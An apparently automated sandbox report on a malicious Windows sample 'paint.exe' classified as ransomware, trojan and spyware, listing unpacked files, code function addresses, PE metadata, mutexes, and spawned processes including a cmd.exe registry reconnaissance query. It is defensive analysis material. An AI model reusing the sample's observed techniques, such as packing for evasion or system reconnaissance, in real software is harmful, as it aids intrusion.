Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DD42E0	88_2_00007FF623DD42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DED2C0	88_2_00007FF623DED2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E102A4	88_2_00007FF623E102A4
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E22268	88_2_00007FF623E22268
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DF7244	88_2_00007FF623DF7244
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDF24C	88_2_00007FF623DDF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DEE21C	88_2_00007FF623DEE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E341CC	88_2_00007FF623E341CC
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E181CC	88_2_00007FF623E181CC
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E12164	88_2_00007FF623E12164
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E0D91C	88_2_00007FF623E0D91C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E00904	88_2_00007FF623E00904
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E1190C	88_2_00007FF623E1190C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E038E8	88_2_00007FF623E038E8
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E218A8	88_2_00007FF623E218A8
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DD8884	88_2_00007FF623DD8884
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE2890	88_2_00007FF623DE2890
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DF67E0	88_2_00007FF623DF67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE17C8	88_2_00007FF623DE17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E0A710	88_2_00007FF623E0A710
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E10710	88_2_00007FF623E10710
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E12700	88_2_00007FF623E12700
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE86C4	88_2_00007FF623DE86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E386D4	88_2_00007FF623E386D4
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E27660	88_2_00007FF623E27660
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E2260C	88_2_00007FF623E2260C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E065FC	88_2_00007FF623E065FC
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE8598	88_2_00007FF623DE8598
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DFF5B0	88_2_00007FF623DFF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E0F59C	88_2_00007FF623E0F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E00D20	88_2_00007FF623E00D20
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDDD04	88_2_00007FF623DDDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E26D0C	88_2_00007FF623E26D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DF9D0C	88_2_00007FF623DF9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E15C8C	88_2_00007FF623E15C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE8C30	88_2_00007FF623DE8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E29B98	88_2_00007FF623E29B98
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E14B38	88_2_00007FF623E14B38
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDCB14	88_2_00007FF623DDCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E3AAC0	88_2_00007FF623E3AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E0FA6C	88_2_00007FF623E0FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E15A70	88_2_00007FF623E15A70
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E169FD	88_2_00007FF623E169FD
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DD49B8	88_2_00007FF623DD49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DFD97C	88_2_00007FF623DFD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DF0104	88_2_00007FF623DF0104
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E300F0	88_2_00007FF623E300F0
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DFC05C	88_2_00007FF623DFC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E00074	88_2_00007FF623E00074
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E08040	88_2_00007FF623E08040
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE3030	88_2_00007FF623DE3030
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E0C00C	88_2_00007FF623E0C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E14FE8	88_2_00007FF623E14FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E3DFD8	88_2_00007FF623E3DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E3AF90	88_2_00007FF623E3AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E05F4C	88_2_00007FF623E05F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E0AF0C	88_2_00007FF623E0AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DD9EFC	88_2_00007FF623DD9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E1EEA4	88_2_00007FF623E1EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDCE84	88_2_00007FF623DDCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E2FE74	88_2_00007FF623E2FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE8E68	88_2_00007FF623DE8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E1AE50	88_2_00007FF623E1AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DE1E04	88_2_00007FF623DE1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DDEE08	88_2_00007FF623DDEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E21DCC	88_2_00007FF623E21DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E19D74	88_2_00007FF623E19D74

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: String function: 00007FF623DE8444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: String function: 00007FF623E149F4 appears 53 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FFE00761325 appears 85 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FFDFB091EB0 appears 33 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FF6F0BD2710 appears 104 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FFDFB069350 appears 135 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FFDFB06A510 appears 163 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FFE007DD341 appears 203 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FFE007DD32F appears 66 times
Source: C:\Users\user\Desktop\paint.exe	Code function: String function: 00007FF6F0BD2910 appears 34 times

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: paint.exe	Binary or memory string: OriginalFilename vs paint.exe
Source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs paint.exe
Source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1673399567.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs paint.exe
Source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1674120289.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000000.1665110321.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedllhost.exej% vs paint.exe
Source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs paint.exe
Source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1674560991.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs paint.exe
Source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1673503521.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs paint.exe
Source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs paint.exe
Source: paint.exe	Binary or memory string: OriginalFilename vs paint.exe
Source: paint.exe, 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs paint.exe
Source: paint.exe, 00000001.00000002.2020135497.00007FFE13318000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2014972970.00007FFDFB02A000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs paint.exe
Source: paint.exe, 00000001.00000002.2020811559.00007FFE1A46A000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs paint.exe
Source: paint.exe, 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2019809610.00007FFE13224000.00000004.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedllhost.exej% vs paint.exe
Source: paint.exe, 00000001.00000002.2018535219.00007FFE11EE3000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2019247215.00007FFE12E1C000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2017388273.00007FFE10262000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2017124172.00007FFE0146C000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs paint.exe
Source: paint.exe, 00000001.00000002.2016893620.00007FFE00829000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilenamelibsslH vs paint.exe
Source: paint.exe, 00000001.00000002.2016544721.00007FFDFB893000.00000004.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamepython312.dll. vs paint.exe
Source: paint.exe, 00000001.00000002.2019495511.00007FFE130CC000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2017652178.00007FFE11523000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2018259022.00007FFE11EB8000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs paint.exe
Source: paint.exe, 00000001.00000002.2018980881.00007FFE126FB000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs paint.exe
Source: paint.exe	Binary or memory string: OriginalFilenamedllhost.exej% vs paint.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

Source: C:\Users\user\Desktop\paint.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\paint.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: paint.exe	Static PE information: Section: .rsrc ZLIB complexity 0.9907060274767802
Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python312.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9993778722426471
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9974962767568659
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9947765261627907

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@177/96@2/2

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Code function: 88_2_00007FF623DECAFC GetLastError,FormatMessageW,

88_2_00007FF623DECAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		88_2_00007FF623E1B57C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DEEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		88_2_00007FF623DEEF50

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Code function: 88_2_00007FF623DF3144 GetDiskFreeSpaceExW,

88_2_00007FF623DF3144

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Users\user\Desktop\paint.exe	Mutant created: \Sessions\1\BaseNamedObjects\X
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9024:120:WilError_03
